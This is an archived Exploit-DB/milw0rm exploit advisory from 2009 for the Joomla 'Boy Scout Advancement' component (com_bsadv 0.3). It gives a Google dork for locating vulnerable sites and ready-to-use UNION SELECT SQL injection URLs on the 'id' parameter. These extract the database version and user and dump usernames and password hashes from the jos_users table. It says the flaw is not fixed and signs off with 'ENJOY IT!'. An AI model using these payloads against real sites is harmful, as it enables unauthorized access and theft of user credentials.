Joomla! Component Boy Scout Advancement 0.3 - 'id' SQL Injection

EDB-ID:

8779


Platform:

PHP

Published:

2009-05-26

***********************************************************************************************
***********************************************************************************************
**	       										     **
**  											     **
**     [] [] []  [][][][>  []     []  [][  ][]     []   [][]]  []  [>  [][][][>  [][][][]    **
**     || || ||  []        [][]   []   []  []     []   []      [] []   []	 []    []    **
** [>  [][][][]  [][][][>  [] []  []   []  []   [][]  []       [][]    [][][][>  []    []    **
**  [-----[]-----[][][][>--[]--[]-[]---[][][]--[]-[]--[]--------[]-----[][][][>--[][][][]---\ 
**==[>    []     []        []   [][]   []  [] [][][]  []       [][]    []           [] []  >>--
**  [----[[]]----[]--- ----[]-----[]---[]--[]-----[]--[]-------[] []---[]----------[]--[]---/ 
   [>   [[[]]]   [][][][>  [][]   [] [][[] [[]]  [][]  [][][]  []  [>  [][][][> <][]   []    **
**							                                     **
**    											     **
**                          ¡VIVA SPAIN!...¡GANAREMOS EL MUNDIAL!...o.O                      **
**					¡PROUD TO BE SPANISH!				     **
**											     **
***********************************************************************************************
***********************************************************************************************

----------------------------------------------------------------------------------------------
|       	   	        MULTIPLE SQL INJECTION VULNERABILITIES        	             |
|--------------------------------------------------------------------------------------------|
|                  | Joomla Component 'Boy Scout Advancement' <= v-0.3 (com_bsadv) |         |
|CMS INFORMATION:   ---------------------------------------------------------------          |
|										             |
|-->WEB: http://bsadv.sourceforge.net/					          	     |
|-->DOWNLOAD: http://bsadv.sourceforge.net/				                     |
|-->DEMO: N/A										     |
|-->CATEGORY: Joomla/Component								     |
|-->DESCRIPTION: BSAdv is a Joomla 1.5 component for Boy Scout unit data and advancement     |
|		data for Boy Scout Troops in the United States...			     |
|-->RELEASED: 2009-02-01								     |
|											     |
|CMS VULNERABILITY:									     |
|											     |
|-->TESTED ON: firefox 3						                     |
|-->DORK --> inurl:"?option=com_bsadv"						             |
|-->CATEGORY: SQL INJECTION							             |
|-->AFFECT VERSION: <= 0.3						 		     |
|-->Discovered Bug date: 2009-05-25							     |
|-->Reported Bug date: 2009-05-25							     |
|-->Fixed bug date: Not fixed								     |
|-->Info patch: Not fixed							             |
|-->Author: YEnH4ckEr									     |
|-->mail: y3nh4ck3r[at]gmail[dot]com							     |
|-->WEB/BLOG: N/A									     |
|-->COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su apoyo.       |
|-->EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!)			     |
----------------------------------------------------------------------------------------------


############################
///////////////////////////

SQL INJECTION VULNS (SQLi):

///////////////////////////
############################



<<<<---------++++++++++++++ Condition: magic quotes=OFF/ON +++++++++++++++++--------->>>>



-------------------
PROOFS OF CONCEPT:
-------------------



[++] GET var --> 'id'


~~~~> http://[HOST]/[PATH]/index.php?option=com_bsadv&controller=peruse&task=event&id=-1+UNION+ALL+SELECT+1,version(),database(),user()%23


[++] GET var --> 'id'


~~~~> http://[HOST]/[PATH]/index.php?option=com_bsadv&controller=peruse&task=account&id=-1+UNION+ALL+SELECT+database(),version()%23&Itemid=57



[++[Return]++] ~~~~~> User, version or database.



-----------
EXPLOITS:
-----------



~~~~> http://[HOST]/[PATH]/index.php?option=com_bsadv&controller=peruse&task=event&id=-1+UNION+ALL+SELECT+1,concat(username,0x3A3A3A,password),3,4+FROM+jos_users+WHERE+id=62%23



[++[Return]++] ~~~~~> Username:::password id=62



~~~~> http://[HOST]/[PATH]/index.php?option=com_bsadv&controller=peruse&task=account&id=-1+UNION+ALL+SELECT+username,password+FROM+jos_users+WHERE+id=62%23&Itemid=57



[++[Return]++] ~~~~~> Username and password id=62




<<<-----------------------------EOF---------------------------------->>>ENJOY IT!



#######################################################################
#######################################################################
##*******************************************************************##
##  SPECIAL THANKS TO: Str0ke and every H4ck3r(all who do milw0rm)!  ##
##*******************************************************************##
##-------------------------------------------------------------------##
##*******************************************************************##
## GREETZ TO: JosS, Ulises2k, J.McCray and Spanish Hack3Rs community!##
##*******************************************************************##
#######################################################################
#######################################################################

# milw0rm.com [2009-05-26]